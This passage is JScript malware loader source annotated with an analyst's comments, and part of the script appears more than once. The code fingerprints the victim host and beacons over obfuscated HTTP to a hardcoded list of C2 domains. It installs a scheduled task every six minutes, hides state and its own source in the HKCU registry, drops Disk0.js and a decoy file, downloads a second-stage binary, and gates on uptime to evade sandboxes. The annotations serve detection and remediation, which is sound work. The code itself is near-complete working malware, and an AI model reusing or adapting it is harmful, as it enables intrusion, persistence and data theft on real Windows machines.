  // Only the first occurrence of each placeholder is replaced (string pattern
  // to String.replace), and a value containing '&' or '=' breaks the split.
  1867. DataTools.Strings.ParseTemplate = function(str, templateStr){
  1868. var template = templateStr.split('&');
  1869. for(var i = 0; i < template.length; i++){
  1870. var keyValue = template[i].split('=');
  1871. str = str.replace('%'.concat(keyValue[0]).concat('%'), keyValue[1]);
  1872. }
  1873.  
  1874. return str;
  1875. }
  1876.  
  // Windows: host-interaction wrappers (shell, environment, registry, files, WMI).
  1877. var Windows = {};
  // Shared WScript.Shell and Scripting.FileSystemObject instances.
  1878. Windows.CoMainObject = ObjectProducer.GetInstance('MAIN_SH_OBJECT');
  1879. Windows.FsIoObject = ObjectProducer.GetInstance('FS_DRIVE_OBJECT');
  1880.  
  // Launches command via WScript.Shell.Run (a child process of the script host).
  1881. Windows.Execute = function(command){
  1882. Windows.CoMainObject.Run(command);
  1883. }
  1884.  
  // Expands %VAR% references in env from the script host's environment.
  1885. Windows.GetEnv = function(env){
  1886. return Windows.CoMainObject.ExpandEnvironmentStrings(env);
  1887. }
  1888.  
  // Reads a registry value by its full path.
  1889. Windows.RegRead = function(path){
  1890. return Windows.CoMainObject.RegRead(path);
  1891. }
  1892.  
  // Writes value to GlobalStrings.REG_ROOT + entry, i.e. under
  // HKCU\Software\ApplicationContainer\Appsw64. Analyst note: this key holds
  // the chosen C2 (ShimV4), the victim id (SetupServiceKey), the client script
  // (ServerUrl) and this loader's own source (WebLib32) — the primary
  // host-based indicator for the family.
  1893. Windows.RegWrite = function(entry, value){
  1894. Windows.CoMainObject.RegWrite(GlobalStrings.REG_ROOT.concat(entry), value);
  1895. }
  1896.  
  // Creates path (CreateTextFile overwrite=2, unicode=true) and fills it with
  // one line of 1024 random letters — a decoy file.
  1897. Windows.CreateFile = function(path){
  1898. var fHandle = Windows.FsIoObject.CreateTextFile(path, 2, true);
  1899. fHandle.WriteLine(DataTools.Random.String(1024));
  1900. fHandle.Close();
  1901. }
  1902.  
  // Writes data as a text line into the NTFS alternate data stream path:stream.
  // Not called anywhere in this section.
  1903. Windows.AppendDataStream = function(path, stream, data){
  1904. var fHandle = Windows.FsIoObject.CreateTextFile(path.concat(":").concat(stream), 2, true);
  1905. fHandle.WriteLine(data);
  1906. fHandle.Close();
  1907. }
  1908.  
  // Saves an open ADODB.Stream into the alternate data stream path:stream
  // (SaveToFile mode 2 = overwrite) and closes it. Not called in this section.
  1909. Windows.AppendDataStreamB = function(path, stream, data){
  1910. data.SaveToFile(path.concat(":").concat(stream), 2);
  1911. data.Close();
  1912. }
  1913.  
  // Writes data to path (CreateTextFile overwrite=true; the unicode flag is
  // left at its default, unlike CreateFile above). Used to drop Disk0.js.
  1914. Windows.WriteData = function(path, data){
  1915. var fHandle = Windows.FsIoObject.CreateTextFile(path, true);
  1916. fHandle.Write(data);
  1917. fHandle.Close();
  1918. }
  1919.  
  // Saves an open ADODB.Stream to path (mode 2 = overwrite) and closes it.
  // Used by Loader.DeployHost for the second-stage .bin.
  1920. Windows.WriteBytes = function(path, data){
  1921. data.SaveToFile(path, 2);
  1922. data.Close();
  1923. }
  1924.  
  // Identical to AppendDataStreamB. Not called in this section.
  1925. Windows.WriteDataStreamBytes = function(path, stream, data){
  1926. data.SaveToFile(path.concat(":").concat(stream), 2);
  1927. data.Close();
  1928. }
  1929.  
  // Returns the whole file as text (OpenTextFile mode 1 = ForReading).
  // The text stream is never closed.
  1930. Windows.ReadFile = function(path){
  1931. var fHandle = Windows.FsIoObject.OpenTextFile(path, 1);
  1932. return fHandle.ReadAll();
  1933. }
  1934.  
  // Binds to the WMI root\cimv2 namespace on pcname ("." = local host).
  1935. Windows.GetWMIProvider = function(pcname){
  1936. return GetObject("winmgmts:"+
  1937. "{impersonationLevel=impersonate}!\\\\" + pcname + "\\root\\cimv2");
  1938. }
  1939.  
  // System uptime in seconds from Win32_PerfFormattedData_PerfOS_System.
  // Any failure (WMI unavailable, empty result set) yields 0, which makes the
  // uptime gate in Loader.DeployClient exit the script.
  1940. Windows.GetUptime = function(){
  1941. try{
  1942. var wmi = Windows.GetWMIProvider(".");
  1943. var queryResult = wmi.ExecQuery("select * from Win32_PerfFormattedData_PerfOS_System");
  1944. var e = new Enumerator(queryResult);
  1945.  
  1946. return parseInt(e.item().SystemUpTime);
  1947. }catch(e){
  1948. return 0;
  1949. }
  1950. }
  1951.  
  // Returns "32" when the ProductName registry string contains "Windows 7",
  // otherwise "64". This is a heuristic on the OS name rather than a real
  // bitness check (64-bit Windows 7 is reported as "32"); the value only
  // feeds the rtag= parameter sent to the C2 in Loader.DeployHost.
  1952. Windows.GetArch = function(){
  1953. var architecture = "64";
  1954. var product = Windows.RegRead("HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows NT\\CurrentVersion\\ProductName");
  1955.  
  1956. if(product.indexOf('Windows 7') != -1){
  1957. architecture = "32";
  1958. }
  1959.  
  1960. return architecture;
  1961. }
  1962.  
  1963.  
  // Http: one shared MSXML2.XMLHTTP client, synchronous GET only.
  1964. var Http = {};
  1965. Http.Client = ObjectProducer.GetInstance('HTTP_CLIENT_OBJECT');
  // Synchronous GET of url. Returns the response body on HTTP 200 and "" on
  // any other status or on an exception, so callers cannot tell an empty body
  // from a failed request. No request headers are set, so the request goes
  // out with the component's default User-Agent — together with the fixed URL
  // shapes built in Loader this is the network detection opportunity.
  1966. Http.Request = function(url){
  1967. try{
  1968. Http.Client.Open('GET', url, false);
  1969. Http.Client.Send();
  1970.  
  1971. if(Http.Client.Status == 200)
  1972. return Http.Client.ResponseText;
  1973. else
  1974. return "";
  1975. }catch(e){
  1976. return ""
  1977. }
  1978. }
  1979.  
  1980.  
  // Loader: victim fingerprinting, C2 check-in, persistence and second-stage
  // download. The environment values below are captured once at load time.
  1981. var Loader = {};
  1982. Loader.USERNAME = Windows.GetEnv("%username%");
  1983. Loader.PCNAME = Windows.GetEnv("%COMPUTERNAME%");
  1984. Loader.DOMAIN = Windows.GetEnv("%USERDOMAIN%");
  1985. Loader.Uptime = Windows.GetUptime();
  // "true" when USERDOMAIN differs from COMPUTERNAME (domain-joined host),
  // "false" otherwise; sent to the C2 as part of the fingerprint.
  1986. Loader.MachineType = (Loader.PCNAME.toUpperCase() != Loader.DOMAIN.toUpperCase()).toString();
  1987.  
  // Victim identifier: Hash(user + host + domain + join-state + version + sig)
  // with SOFT_VERSION appended in clear. Deterministic for a given host and
  // build; also used to derive the key that decodes C2 responses.
  1988. Loader.GetUid = function(){
  1989. return DataTools.Hash(Loader.USERNAME+Loader.PCNAME+Loader.DOMAIN+Loader.MachineType+config.SOFT_VERSION+config.SOFT_SIG) + config.SOFT_VERSION;
  1990. }
  1991.  
  // Builds the check-in payload: the fingerprint fields joined with ':',
  // XORed with DeriveKey(nonce + C2_OB_KEY), base64-encoded, then URL-encoded.
  // The nonce is sent in the same URL (ubwG=), so anyone holding the static
  // C2_OB_KEY can decode the payload from a packet capture.
  1992. Loader.GetInitialRequest = function(nonce){
  1993. var uid = Loader.GetUid();
  1994. var request = [Loader.USERNAME, Loader.PCNAME, Loader.DOMAIN, Loader.MachineType, uid, config.SOFT_SIG, config.SOFT_VERSION, Loader.Uptime];
  1995.  
  1996. var sessionKey = nonce + config.C2_OB_KEY;
  1997. request = request.join(":");
  1998. request = DataTools.RotString(request, DataTools.DeriveKey(sessionKey));
  1999. request = Base64Encode(request);
  2000.  
  2001. return encodeURIComponent(request);
  2002. }
  2003.  
  // Check-in URL path:
  //   /<C2_PREFIX>?winrm=2387&view2=classic&regclid=<payload>&client=<31 letters>
  //   &service_id=FE0<1..10000>&ubwG=<12-letter nonce>
  // The fixed parameter names and the lowercase-only random values are a
  // stable network signature for this build.
  2004. Loader.GetInitialEndpoint = function(){
  2005. var nonce = DataTools.Random.String(12)
  2006. var request = Loader.GetInitialRequest(nonce);
  2007.  
  2008. var endpoint = "/" + config.C2_PREFIX + "?winrm=2387&view2=classic&regclid=" + request + "&client=" + DataTools.Random.String(31) + "&service_id=FE0" + DataTools.Random.Number(1,10000) + "&ubwG=" + nonce;
  2009. return endpoint;
  2010. }
  2011.  
  // Fetches the second stage ("plugin host") from SELECTED_C2/go.aspx, sending
  // the XOR-obfuscated uid, the nonce and the arch tag as query parameters.
  // The response is XOR-decoded with DeriveKey(uid + C2_OB_KEY), base64-decoded
  // and written to %temp%\<uid>.bin, whose path is returned. The HTTP result
  // is not checked: on failure Http.Request yields "" and an empty payload
  // reaches Base64bytes. Nothing in this section executes the .bin.
  2012. Loader.DeployHost = function(){
  2013. var temp = Windows.GetEnv("%temp%");
  2014. var architecture = Windows.GetArch();
  2015. var nonce = DataTools.Random.String(12);
  2016. var uid = Loader.GetUid();
  2017. var sessionKey = nonce + config.C2_OB_KEY;
  2018.  
  2019. var encodedId = DataTools.RotString(uid, DataTools.DeriveKey(sessionKey));
  2020. encodedId = Base64Encode(encodedId);
  2021. encodedId = encodeURIComponent(encodedId);
  2022.  
  2023. var pluginHost = Http.Request(SELECTED_C2 + "/go.aspx?link=" + DataTools.Random.String(4) +"&goal=6E&r_ctplGuid=" + encodedId + "&TS2=" + nonce + "&rtag=" + architecture + "&e6_endpoint=29283291210281_2");
  2024. pluginHost = DataTools.RotString(pluginHost, DataTools.DeriveKey(uid.concat(config.C2_OB_KEY)));
  2025.  
  2026. var filename = uid.concat(".bin");
  2027.  
  2028. Windows.WriteBytes(temp.concat("\\").concat(filename), Base64bytes(pluginHost));
  2029. return temp.concat("\\").concat(filename);
  2030.  
  2031. }
  2032.  
  // Main check-in routine.
  //  - Uptime gate: exits when the host has been up for <= 3000 s (~50 min),
  //    a cheap sandbox / freshly-booted-VM check.
  //  - Up to C2_FAIL_COUNT passes over config.PRIMARY_C2: GET the check-in
  //    endpoint, XOR-decode the body with DeriveKey(uid + C2_OB_KEY); a body
  //    containing the '<<<CLIENT__' marker carries the base64 client script.
  //  - On success: ShimV4 <- chosen C2 and SetupServiceKey <- uid in the
  //    registry, SELECTED_C2 updated, Persist(client) installs it, return.
  //  - Exceptions per attempt are swallowed; C2_REQUEST_SLEEP seconds are
  //    slept after every host, successful or not.
  2033. Loader.DeployClient = function() {
  2034. if (Loader.Uptime <= 3000) {
  2035. WScript.Quit(0);
  2036. }
  2037.  
  2038. for (var i = 0; i < config.C2_FAIL_COUNT; i++) {
  2039. for (var j = 0; j < config.PRIMARY_C2.length; j++) {
  2040. try {
  2041. var response = Http.Request(config.PRIMARY_C2[j] + Loader.GetInitialEndpoint());
  2042. response = DataTools.RotString(response, DataTools.DeriveKey(Loader.GetUid().concat(config.C2_OB_KEY)));
  2043.  
  2044. if (response.indexOf('<<<CLIENT__') !== -1) {
  2045. var client = response.replace('<<<CLIENT__', '');
  2046. client = Base64text(client);
  2047.  
  2048. Windows.RegWrite("ShimV4", config.PRIMARY_C2[j]);
  2049. Windows.RegWrite("SetupServiceKey", Loader.GetUid());
  2050.  
  2051. SELECTED_C2 = config.PRIMARY_C2[j];
  2052. Loader.Persist(client);
  2053. return;
  2054.  
  2055. }
  2056. } catch (e) {
  2057.  
  2058. }
  2059.  
  2060. WScript.Sleep(config.C2_REQUEST_SLEEP * 1000);
  2061. }
  2062. }
  2063. }
  2064.  
  // Persistence and staging for the downloaded client script:
  //  1. schtasks: task TASK_NAME runs PERSIST_COMMAND every 6 minutes
  //     (TASK_LOOP_CREATE with timeout=6).
  //  2. Registry: ServerUrl <- decoded client; WebLib32 <- this loader's own
  //     source, read back from WScript.ScriptFullName, so it can later be
  //     re-loaded from the registry without the original file.
  //  3. Files: random-content decoy at NTFILE_PATH; client written to
  //     C:\Users\Public\Disk0.js, the file the scheduled task launches.
  //  4. DeployHost() for the second stage.
  // Analyst note: the task name, both C:\Users\Public paths and the REG_ROOT
  // values are the remediation checklist for this stage.
  2065. Loader.Persist = function(client){
  2066.  
  2067. var taskCommandTemplate = "name=".concat(GlobalStrings.TASK_NAME).concat("&command=").concat(GlobalStrings.PERSIST_COMMAND).concat("&timeout=6");
  2068. var taskCommand = DataTools.Strings.ParseTemplate(GlobalStrings.TASK_LOOP_CREATE, taskCommandTemplate);
  2069.  
  2070. Windows.Execute(taskCommand);
  2071. Windows.RegWrite("ServerUrl", client);
  2072. Windows.RegWrite("WebLib32", Windows.ReadFile(WScript.ScriptFullName));
  2073.  
  2074. Windows.CreateFile(GlobalStrings.NTFILE_PATH);
  2075.  
  2076. Windows.WriteData("C:\\Users\\Public\\Disk0.js", client);
  2077.  
  2078. Loader.DeployHost();
  2079. }
  2080.  
  // Shows message in a WScript.Shell popup. Development leftover; not called
  // anywhere in this section.
  2081. function debug(message){
  2082. ObjectProducer.GetInstance('MAIN_SH_OBJECT').Popup(message);
  2083. }
  2084.  
  2085.  
  // Decodes a base64 string to UTF-8 text: MSXML's bin.Base64 dataType yields
  // the raw bytes, which are pushed through an ADODB.Stream switched from
  // binary (Type 1) to text (Type 2, CharSet utf-8). Used on the client script
  // returned by the C2. The stream is never closed.
  2086. function Base64text(string){
  2087. var XmlDOM = new ActiveXObject("Microsoft.XMLDOM");
  2088. var element = XmlDOM.createElement("tempContainer");
  2089. element.dataType = "bin.Base64";
  2090. element.text = string;
  2091.  
  2092. var stream = WScript.CreateObject("ADODB.Stream");
  2093. stream.Type = 1;
  2094. stream.Open();
  2095. stream.Write(element.nodeTypedValue);
  2096.  
  2097. stream.Position = 0;
  2098. stream.Type = 2;
  2099. stream.CharSet = "utf-8";
  2100.  
  2101. return stream.ReadText();
  2102. }
  2103.  
  // Converts string to a binary byte array via an ADODB.Stream written as
  // text with CharSet "ascii" and read back in binary mode (Type 1).
  // Characters outside ASCII are not representable in that charset and may
  // be altered. The stream is never closed.
  2104. function StringToBinary(string){
  2105. var BinaryStream = new ActiveXObject("ADODB.Stream");
  2106. BinaryStream.Type = 2;
  2107. BinaryStream.CharSet = "ascii";
  2108. BinaryStream.Open();
  2109. BinaryStream.WriteText(string);
  2110. BinaryStream.Position = 0;
  2111. BinaryStream.Type = 1;
  2112. BinaryStream.Position = 0;
  2113. return BinaryStream.Read();
  2114. }
  2115.  
  2116.  
  // Decodes a base64 string into an open binary ADODB.Stream (positioned at
  // the end of the written data) and returns the stream; the caller
  // (Windows.WriteBytes) saves it to disk and closes it.
  2117. function Base64bytes(string){
  2118. var XmlDOM = WScript.CreateObject("MSXml2.DOMDocument");
  2119. var element = XmlDOM.createElement("Base64Data");
  2120. element.dataType = "bin.base64";
  2121.  
  2122. element.text = string;
  2123.  
  2124. var stream = WScript.CreateObject("ADODB.Stream");
  2125. stream.Type = 1;
  2126. stream.Open();
  2127.  
  2128. stream.Write(element.nodeTypedValue);
  2129. return stream;
  2130. }
  2131.  
  // Base64-encodes string (as ASCII bytes, via StringToBinary) using MSXML.
  // Newlines that MSXML inserts into long output are stripped; every "//" is
  // removed as well, which alters the encoding for any input whose base64
  // form contains that sequence — presumably the C2 side compensates, but
  // that cannot be confirmed from this script.
  2132. function Base64Encode(string) {
  2133.  
  2134. var XmlDOM = WScript.CreateObject("MSXml2.DOMDocument");
  2135. var element = XmlDOM.createElement("Base64Data");
  2136. element.dataType = "bin.base64";
  2137.  
  2138. element.nodeTypedValue = StringToBinary(string);
  2139.  
  2140. return element.text.replace(/\n/g, "").replace(/\/\//g, "");
  2141. }
  2142.  
  2143.  
  // Entry point: DeployClient() runs only when CLIENT_IMPORT_ENV is undefined,
  // i.e. when this file is executed on its own rather than eval'd by a stub
  // that predefines that variable. NOTE(review): `config` and the Math.imul
  // polyfill are assigned below this statement; with var hoisting `config` is
  // undefined here unless an earlier assignment exists in the complete script
  // (the dump shows the script repeated) — confirm against the full file.
  2144. if(typeof(CLIENT_IMPORT_ENV) == typeof(undefined)){
  2145. Loader.DeployClient();
  2146. }
  // Build configuration / indicators for this sample:
  //  PRIMARY_C2       - hosts tried in order by DeployClient. The first three
  //                     resemble legitimate Microsoft/CDN hostnames; treat the
  //                     list as a whole as the indicator set and verify each
  //                     entry before blocking rather than assuming every host
  //                     is attacker-controlled.
  //  SOFT_SIG / SOFT_VERSION - campaign tag and version, both mixed into GetUid.
  //  C2_REQUEST_SLEEP - seconds slept between C2 attempts (DeployClient).
  //  C2_FAIL_SLEEP    - declared but not referenced in this section.
  //  C2_FAIL_COUNT    - number of full passes over PRIMARY_C2.
  //  C2_OB_KEY        - static secret mixed into the XOR key (DeriveKey).
  //  C2_PREFIX        - check-in endpoint name (/rpc.aspx).
  2147. var config = {
  2148. PRIMARY_C2 : ['http://az361816.vo.msecnd.net','http://msnbot-207-46-194-33.search.msn.com','http://ec.atdmt.com','http://a-zcorner.com','http://knockoutlights.com','http://organicgreensfl.com','http://d0d0f3d189430.com','http://d0d0abee1d18255e.com'],
  2149. SOFT_SIG : 'mad29',
  2150. SOFT_VERSION: 32,
  2151. C2_REQUEST_SLEEP : 21,
  2152. C2_FAIL_SLEEP : 21,
  2153. C2_FAIL_COUNT : 20,
  2154. C2_OB_KEY : 'JxTRG4mY',
  2155.  
  2156.  
  2157. C2_PREFIX : 'rpc.aspx'
  2158. }
  2159.  
  2160.  
  // C2 used by DeployHost; defaults to the first entry and is overwritten by
  // DeployClient with whichever host answered.
  2161. var SELECTED_C2 = config.PRIMARY_C2[0];
  2162.  
  2163.  
  // Unconditionally replaces Math.imul with a 32-bit integer multiply
  // polyfill (the script host's JScript engine may lack it). Required by
  // DataTools.Hash.
  2164. Math.imul = function (a, b) {
  2165. var ah = (a >>> 16) & 0xffff;
  2166. var al = a & 0xffff;
  2167. var bh = (b >>> 16) & 0xffff;
  2168. var bl = b & 0xffff;
  2169. return ((al * bl) + (((ah * bl + al * bh) << 16) >>> 0) | 0);
  2170. };
  2171.  
  2172.  
  // GlobalStrings: constants and command templates (%name% placeholders are
  // filled by DataTools.Strings.ParseTemplate).
  //  REG_ROOT          - HKCU key holding the loader's state (Windows.RegWrite).
  //  WMIC_EXEC(_ARGS)  - process-creation templates; not referenced in this section.
  //  TASK_CREATE       - one-shot schtasks template; not referenced in this section.
  //  TASK_LOOP_CREATE  - recurring schtasks template used by Loader.Persist.
  //  NTFILE_PATH       - decoy file written by Loader.Persist.
  //  ADS_SSID          - alternate-data-stream name; not referenced in this section.
  //  PERSIST_COMMAND   - what the scheduled task runs (explorer.exe opening Disk0.js).
  //  TASK_NAME         - scheduled task display name.
  // Analyst note: the task name, the two C:\Users\Public paths and the
  // registry key are the durable host indicators for this stage.
  2173. var GlobalStrings = {
  2174. REG_ROOT : "HKEY_CURRENT_USER\\Software\\ApplicationContainer\\Appsw64\\",
  2175. WMIC_EXEC_ARGS : "wmic process call create \"%path% %args%\"",
  2176. WMIC_EXEC : "wmic process call create \"%path%\"",
  2177. TASK_CREATE : "schtasks /Create /F /TN \"%name%\" /TR \"%command%\" /SC Once /ST %time%",
  2178. TASK_LOOP_CREATE : "schtasks /Create /F /TN \"%name%\" /TR \"%command%\" /SC Minute /MO %timeout%",
  2179. NTFILE_PATH : "C:\\Users\\Public\\diskdiag.ini",
  2180. ADS_SSID : "HDDScan",
  2181. PERSIST_COMMAND : "explorer.exe C:\\Users\\Public\\Disk0.js",
  2182. TASK_NAME : "Disk Diagnostics"
  2183. }
  2184.  
  2185.  
  // ObjectProducer (repeated copy — the dump contains the script several
  // times): COM factory mapping short keys to the ProgIDs instantiated via
  // ActiveXObject. The ProgID set here (WScript.Shell, ADODB.Stream,
  // MSXML2.XMLHTTP, Scripting.FileSystemObject) is a good hunting signal when
  // instantiated from a Windows Script Host process.
  2186. var ObjectProducer = {}
  2187. ObjectProducer.AccesibleObjects = {
  2188. MAIN_SH_OBJECT : 'WScript.Shell',
  2189. STREAM_ACCESS_OBJECT : 'ADODB.Stream',
  2190. XML_TREE_OBJECT : 'Microsoft.XMLDOM',
  2191. XML_TREE_V2_OBJECT : 'MSXml2.DOMDocument',
  2192. HTTP_CLIENT_OBJECT : 'MSXML2.XMLHTTP',
  2193. FS_DRIVE_OBJECT : 'Scripting.FileSystemObject'
  2194. };
  2195.  
  // Constructor used for every COM instantiation.
  2196. ObjectProducer.GetRootConstructor = function(){
  2197. return ActiveXObject;
  2198. }
  2199.  
  // Instantiates the COM object whose ProgID is stored under instanceKey.
  2200. ObjectProducer.GetInstance = function(instanceKey){
  2201. var rootConstructor = ObjectProducer.GetRootConstructor();
  2202. return new rootConstructor(ObjectProducer.AccesibleObjects[instanceKey]);
  2203. }
  2204.  
  2205.  
  2206.  
  // DataTools (repeated copy): obfuscation / encoding helpers.
  2207. var DataTools = {};
  2208. DataTools.KEY_BASE = 1029;
  2209.  
  // XOR-folds keyStr into KEY_BASE and returns the digit sum of the result —
  // a two-digit XOR key at most, so RotString output is trivially recoverable.
  2210. DataTools.DeriveKey = function(keyStr){
  2211. var keyBase = DataTools.KEY_BASE;
  2212. var key = 0;
  2213.  
  2214. for(var i = 0; i < keyStr.length; i++){
  2215. keyBase = keyBase ^ keyStr.charCodeAt(i);
  2216. }
  2217.  
  2218. var _keyBase = keyBase.toString();
  2219. for(var i = 0; i < _keyBase.length; i++){
  2220. key += parseInt(_keyBase.charAt(i));
  2221. }
  2222.  
  2223. return key;
  2224. }
  2225.  
  // Single-key XOR of every code unit; self-inverse (encode and decode).
  2226. DataTools.RotString = function(str, key){
  2227. var rotd = "";
  2228. for(var i = 0; i < str.length; i++){
  2229. rotd = rotd.concat(String.fromCharCode((str.charCodeAt(i) ^ key)));
  2230. }
  2231.  
  2232. return rotd;
  2233. }
  2234.  
  // 32-bit multiplicative hash (seed 0xdeadbeef, multiplier 2654435761) as
  // lowercase hex; feeds the victim id. Needs the Math.imul polyfill.
  2235. DataTools.Hash = function(str){
  2236. for(var i = 0, h = 0xdeadbeef; i < str.length; i++)
  2237. h = Math.imul(h ^ str.charCodeAt(i), 2654435761);
  2238.  
  2239. return ((h ^ h >>> 16) >>> 0).toString(16);
  2240. }
  2241.  
  // Math.random-based helpers (not cryptographic).
  2242. DataTools.Random = {};
  2243. DataTools.Random.Number = function(min, max){
  2244. min = Math.ceil(min);
  2245. max = Math.floor(max);
  2246. return Math.floor(Math.random() * (max - min + 1)) + min;
  2247. }
  2248.  
  // len random lowercase letters (URL padding, nonce, decoy file content).
  2249. DataTools.Random.String = function(len){
  2250. var alphabet = "qwertyuiopasdfghjklzxcvbnm";
  2251. var result = "";
  2252. for(var i = 0; i < len; i++){
  2253. var chr = DataTools.Random.Number(0, alphabet.length-1);
  2254. result = result.concat(alphabet.charAt(chr));
  2255. }
  2256.  
  2257. return result;
  2258. }
  2259.  
  2260.  
  2261. DataTools.Strings = {};
  // Fills %key% placeholders in str from a "k=v&k2=v2" string; only the first
  // occurrence of each placeholder is replaced.
  2262. DataTools.Strings.ParseTemplate = function(str, templateStr){
  2263. var template = templateStr.split('&');
  2264. for(var i = 0; i < template.length; i++){
  2265. var keyValue = template[i].split('=');
  2266. str = str.replace('%'.concat(keyValue[0]).concat('%'), keyValue[1]);
  2267. }
  2268.  
  2269. return str;
  2270. }
  2271.  
  // Windows (repeated copy): shell / registry / file / WMI wrappers.
  2272. var Windows = {};
  2273. Windows.CoMainObject = ObjectProducer.GetInstance('MAIN_SH_OBJECT');
  2274. Windows.FsIoObject = ObjectProducer.GetInstance('FS_DRIVE_OBJECT');
  2275.  
  // Runs command via WScript.Shell.Run.
  2276. Windows.Execute = function(command){
  2277. Windows.CoMainObject.Run(command);
  2278. }
  2279.  
  // Expands %VAR% references.
  2280. Windows.GetEnv = function(env){
  2281. return Windows.CoMainObject.ExpandEnvironmentStrings(env);
  2282. }
  2283.  
  2284. Windows.RegRead = function(path){
  2285. return Windows.CoMainObject.RegRead(path);
  2286. }
  2287.  
  // Writes under GlobalStrings.REG_ROOT (HKCU\Software\ApplicationContainer\
  // Appsw64): the loader's C2, victim id, client script and own source live
  // here — the primary host indicator for the family.
  2288. Windows.RegWrite = function(entry, value){
  2289. Windows.CoMainObject.RegWrite(GlobalStrings.REG_ROOT.concat(entry), value);
  2290. }
  2291.  
  // Decoy file: one line of 1024 random letters.
  2292. Windows.CreateFile = function(path){
  2293. var fHandle = Windows.FsIoObject.CreateTextFile(path, 2, true);
  2294. fHandle.WriteLine(DataTools.Random.String(1024));
  2295. fHandle.Close();
  2296. }
  2297.  
  // Text write into the alternate data stream path:stream; unused here.
  2298. Windows.AppendDataStream = function(path, stream, data){
  2299. var fHandle = Windows.FsIoObject.CreateTextFile(path.concat(":").concat(stream), 2, true);
  2300. fHandle.WriteLine(data);
  2301. fHandle.Close();
  2302. }
  2303.  
  // Binary write (ADODB.Stream) into the alternate data stream; unused here.
  2304. Windows.AppendDataStreamB = function(path, stream, data){
  2305. data.SaveToFile(path.concat(":").concat(stream), 2);
  2306. data.Close();
  2307. }
  2308.  
  // Text write to path (overwrite); drops Disk0.js in Loader.Persist.
  2309. Windows.WriteData = function(path, data){
  2310. var fHandle = Windows.FsIoObject.CreateTextFile(path, true);
  2311. fHandle.Write(data);
  2312. fHandle.Close();
  2313. }
  2314.  
  // Saves and closes an ADODB.Stream (mode 2 = overwrite); used for the
  // second-stage .bin in Loader.DeployHost.
  2315. Windows.WriteBytes = function(path, data){
  2316. data.SaveToFile(path, 2);
  2317. data.Close();
  2318. }
  2319.  
  // Same as AppendDataStreamB; unused here.
  2320. Windows.WriteDataStreamBytes = function(path, stream, data){
  2321. data.SaveToFile(path.concat(":").concat(stream), 2);
  2322. data.Close();
  2323. }
  2324.  
  // Whole file as text; the text stream is never closed.
  2325. Windows.ReadFile = function(path){
  2326. var fHandle = Windows.FsIoObject.OpenTextFile(path, 1);
  2327. return fHandle.ReadAll();
  2328. }
  2329.  
  2330. Windows.GetWMIProvider = function(pcname){
  2331. return GetObject("winmgmts:"+
  2332. "{impersonationLevel=impersonate}!\\\\" + pcname + "\\root\\cimv2");
  2333. }
  2334.  
  // Uptime in seconds via WMI; 0 on any failure (which makes DeployClient exit).
  2335. Windows.GetUptime = function(){
  2336. try{
  2337. var wmi = Windows.GetWMIProvider(".");
  2338. var queryResult = wmi.ExecQuery("select * from Win32_PerfFormattedData_PerfOS_System");
  2339. var e = new Enumerator(queryResult);
  2340.  
  2341. return parseInt(e.item().SystemUpTime);
  2342. }catch(e){
  2343. return 0;
  2344. }
  2345. }
  2346.  
  // "32" if ProductName contains "Windows 7", else "64" — an OS-name
  // heuristic, not a bitness check; only feeds the rtag= C2 parameter.
  2347. Windows.GetArch = function(){
  2348. var architecture = "64";
  2349. var product = Windows.RegRead("HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows NT\\CurrentVersion\\ProductName");
  2350.  
  2351. if(product.indexOf('Windows 7') != -1){
  2352. architecture = "32";
  2353. }
  2354.  
  2355. return architecture;
  2356. }
  2357.  
  2358.  
  // Http (repeated copy): synchronous GET through one MSXML2.XMLHTTP client.
  // Returns the body on HTTP 200, "" on any other status or exception; no
  // headers are set, so the default User-Agent goes out with every request.
  2359. var Http = {};
  2360. Http.Client = ObjectProducer.GetInstance('HTTP_CLIENT_OBJECT');
  2361. Http.Request = function(url){
  2362. try{
  2363. Http.Client.Open('GET', url, false);
  2364. Http.Client.Send();
  2365.  
  2366. if(Http.Client.Status == 200)
  2367. return Http.Client.ResponseText;
  2368. else
  2369. return "";
  2370. }catch(e){
  2371. return ""
  2372. }
  2373. }
  2374.  
  2375.  
  // Loader (repeated copy): fingerprinting, C2 check-in, persistence and
  // second-stage download. Environment values are captured at load time.
  2376. var Loader = {};
  2377. Loader.USERNAME = Windows.GetEnv("%username%");
  2378. Loader.PCNAME = Windows.GetEnv("%COMPUTERNAME%");
  2379. Loader.DOMAIN = Windows.GetEnv("%USERDOMAIN%");
  2380. Loader.Uptime = Windows.GetUptime();
  // "true" when the host is domain-joined (USERDOMAIN != COMPUTERNAME).
  2381. Loader.MachineType = (Loader.PCNAME.toUpperCase() != Loader.DOMAIN.toUpperCase()).toString();
  2382.  
  // Victim id: hash of user/host/domain/join-state/version/sig, with
  // SOFT_VERSION appended in clear; deterministic per host and build.
  2383. Loader.GetUid = function(){
  2384. return DataTools.Hash(Loader.USERNAME+Loader.PCNAME+Loader.DOMAIN+Loader.MachineType+config.SOFT_VERSION+config.SOFT_SIG) + config.SOFT_VERSION;
  2385. }
  2386.  
  // Check-in payload: ':'-joined fingerprint, XORed with
  // DeriveKey(nonce + C2_OB_KEY), base64- then URL-encoded. The nonce travels
  // in the same URL, so the payload is decodable from a capture with the
  // static C2_OB_KEY.
  2387. Loader.GetInitialRequest = function(nonce){
  2388. var uid = Loader.GetUid();
  2389. var request = [Loader.USERNAME, Loader.PCNAME, Loader.DOMAIN, Loader.MachineType, uid, config.SOFT_SIG, config.SOFT_VERSION, Loader.Uptime];
  2390.  
  2391. var sessionKey = nonce + config.C2_OB_KEY;
  2392. request = request.join(":");
  2393. request = DataTools.RotString(request, DataTools.DeriveKey(sessionKey));
  2394. request = Base64Encode(request);
  2395.  
  2396. return encodeURIComponent(request);
  2397. }
  2398.  
  // Check-in path with fixed parameter names (winrm, view2, regclid, client,
  // service_id, ubwG) — a stable network signature for this build.
  2399. Loader.GetInitialEndpoint = function(){
  2400. var nonce = DataTools.Random.String(12)
  2401. var request = Loader.GetInitialRequest(nonce);
  2402.  
  2403. var endpoint = "/" + config.C2_PREFIX + "?winrm=2387&view2=classic&regclid=" + request + "&client=" + DataTools.Random.String(31) + "&service_id=FE0" + DataTools.Random.Number(1,10000) + "&ubwG=" + nonce;
  2404. return endpoint;
  2405. }
  2406.  
  // Downloads the second stage from SELECTED_C2/go.aspx, XOR-decodes it with
  // DeriveKey(uid + C2_OB_KEY), base64-decodes and writes %temp%\<uid>.bin;
  // returns that path. HTTP failure is not checked. Nothing in this section
  // executes the .bin.
  2407. Loader.DeployHost = function(){
  2408. var temp = Windows.GetEnv("%temp%");
